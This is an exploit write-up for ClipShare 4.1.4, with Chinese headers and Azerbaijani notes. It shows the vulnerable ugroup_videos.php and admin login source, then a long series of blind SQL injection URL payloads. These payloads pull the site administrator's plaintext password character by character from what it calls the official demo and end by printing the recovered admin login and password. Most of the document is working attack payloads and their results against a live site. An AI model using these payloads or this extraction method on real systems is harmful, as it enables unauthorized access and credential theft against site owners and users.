影响程序: ClipShare - Video Sharing Community Script 4.1.4  

官网:  

缺陷类型: Blind SQl injection && Plaintext Password.  

AFAIK所有版本问题:  

Official Demo is also vulnerable: ?urlkey=%27%20and%203=%273  

最新监测: 13 March 2013  

提示:To exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)  

缺陷文件:  

//ugroup_videos.php  

=========================== BEGIN OF ugroup_videos.php =============================================  

<?php  

/***************************

| Software Name        : ClipShare - Video Sharing Community Script  

| Software Author      : Clip-Share.Com / ScriptXperts.Com  

| Website              :  

| E-mail               : office@clip-share.com  

|****************************

| This source file is subject to the ClipShare End-User License Agreement, available online at:  

|  

| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.  

|******************************

| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.  

|***************************

require('include/config.php');  

require('include/function.php');  

$urlkey  = ( isset($_REQUEST['urlkey']) ) ? $_REQUEST['urlkey'] : NULL;  

$uid  = ( isset($_REQUEST['UID']) && is_numeric($_REQUEST['UID']) ) ? $_REQUEST['UID'] : NULL;  

$sql="SELECT * from group_own WHERE gurl='" .$urlkey. "' limit 1";  

$rs = $conn->Execute($sql);  

if($rs->recordcount()>0) {  

STemplate::assign('groupname',$rs->fields[gname]);  

//PAGING STARTS  

$page     = ( isset($_REQUEST['page']) && is_numeric($_REQUEST['page']) ) ? $_REQUEST['page'] : NULL;  

$sql     = "SELECT count(*) as total from group_mem WHERE GID='" .$rs->fields['GID']. "' limit 1";  

$ars     = $conn->Execute($sql);  

$total    = ( $ars->fields['total']<=$config['total_per_ini'] ) ? $ars->fields['total'] : $config['total_per_ini'];  

$tpage     = ceil($total/$config['items_per_page']);  

$spage    = ( $tpage == 0 ) ? $tpage+1 : $tpage;  

$startfrom   = ($page-1)*$config['items_per_page'];  

$sql    = "SELECT m.*,s.addtime from group_mem as m,signup as s WHERE m.MID=s.UID and m.GID='".$rs->fields['GID']."' limit $startfrom, " .$config['items_per_page'];  

$rs    = $conn->execute($sql);  

if($rs->recordcount()>0)  

$vdo = $rs->getrows();  

$start_num  = $startfrom+1;  

$end_num  = $startfrom+$rs->recordcount();  

$page_link  = '';  

$type    = ( isset($_REQUEST['type']) && $_REQUEST['type'] != '' ) ? "&type=" .$_REQUEST['type'] : NULL;  

for ( $k=1;$k<=$tpage;$k++ )  

$page_link.="<a href='group_members.php?UID=" .$uid. "&page=" .$k. $type. "'>$k</a>&nbsp;&nbsp;";  

//END PAGING  

}  

STemplate::assign('err',$err);  

STemplate::assign('msg',$msg);  

STemplate::assign('page',$page);  

STemplate::assign('start_num',$start_num);  

STemplate::assign('end_num',$end_num);  

STemplate::assign('page_link',$page_link);  

STemplate::assign('total',$total);  

STemplate::assign('answers',$vdo);  

STemplate::assign('head_bottom',"grouplinks.tpl");  

STemplate::display('head1.tpl');  

STemplate::display('err_msg.tpl');  

STemplate::display('ugroup_members.tpl');  

STemplate::display('footer.tpl');  

STemplate::gzip_encode();  

?>  

====================END OF ugroup_videos.php========================  

Real exploitation example:  

_REMOVED_/ugroup_videos.php?urlkey=1' order by 14-- 3='3  

?urlkey=1' or (select if(5=5,0,3))-- 3='3  

//ON TRUE  

//RETURNS: NORMAL PAGE  

?urlkey=1' or (select if(5=5,0,3))-- 3='3  

//ON FALSE  

// RETURNS NOTHING.(White Page)  

?urlkey=1' or (select if(5=2,0,3))-- 3='3  

Plaintext password:  

//siteadmin/login.php  

============ BEGIN OF siteadmin/login.php ===========================  

<?php  

include('../include/config.php');  

if ( isset($_POST['submit_login']) ) {  

$username   = trim($_POST['username']);  

$password   = trim($_POST['password']);  

if ( $username == '' or $password == '' ) {  

$err = 'Please provide a username and password!';  

} else {  

$access = false;  

$sql    = "SELECT soption FROM sconfig WHERE soption = 'admin_name' AND svalue = '" .mysql_real_escape_string($username). "'";  

$conn->execute($sql);  

if ( $conn->Affected_Rows() == 1 ) {  

$sql = "SELECT soption FROM sconfig WHERE soption = 'admin_pass' AND svalue = '" .mysql_real_escape_string($password). "'";  

$conn->execute($sql);  

if ( $conn->Affected_Rows() == 1 ) {  

$access = true;  

}  

}  

// SNIP //  

============ END OF siteadmin/login.php ===========================  

//TRUE  

?urlkey=1' or (select if(count(`svalue`)!=0,0,3) from sconfig)-- 3='3  

80 user: ?urlkey=1' or (select if(count(`svalue`)=80,0,3) from sconfig)-- 3='3  

?urlkey=1' or (select if(count(0)=1,0,3) from sconfig where soption='admin_name')-- 3='3  

Passi cekirik:  

?urlkey=1' or (select if(length(svalue)='11',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

11 simvolludur pass.  

========================================================  

1-ci simvol:  o  

?urlkey=1' or (select if(mid(svalue,1,1)='o',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

2-ci simvol:  (  

?urlkey=1' or (select if(mid(svalue,2,1)='(',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

3-cu simvol:   2  

?urlkey=1' or (select if(mid(svalue,3,1)='2',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

4-cu simvol:       n  

?urlkey=1' or (select if(mid(svalue,4,1)='n',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

5-ci simvol:         @  

?urlkey=1' or (select if(mid(svalue,5,1)='@',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

6-ci simvol:           b  

?urlkey=1' or (select if(mid(svalue,6,1)='b',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

7-ci simvol:          % (yoxla sonra)  

?urlkey=1' or (select if(mid(svalue,7,1)='%',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

8-ci simvol:          h  

?urlkey=1' or (select if(mid(svalue,8,1)='h',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

9-cu simvol:         a  

?urlkey=1' or (select if(mid(svalue,9,1)='a',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

10-cu simvol:         5  

?urlkey=1' or (select if(mid(svalue,10,1)='5',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

11-ci simvol:   1  

?urlkey=1' or (select if(mid(svalue,11,1)='1',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

========================================================  

?urlkey=1' or (select if(mid(svalue,1,15)='o(2n@b%ha51',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

//Parol duzdur tamamile ascii representasionu yoxlamaga ehtiyyac yoxdur.(plaintext oldugundan subhe yaradirdi)  

?urlkey=1' or (select if(mid(svalue,1,15)=0x6F28326E40622568613531,0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  

pass: o(2n@b%ha51  

/ugroup_videos.php?urlkey=1' or (select if(svalue='admin',0,3) from sconfig where soption='admin_name' limit 1 offset 0)-- 3='3  

login: admin  

pass: o(2n@b%ha51  

 

OwnEd.  

已测试版本:  

Tuesday, March 12, 2013 | Version: 4.1.4 | Username: admin | Logout  

Copyright © 2006-2008 ClipShare. All rights reserved.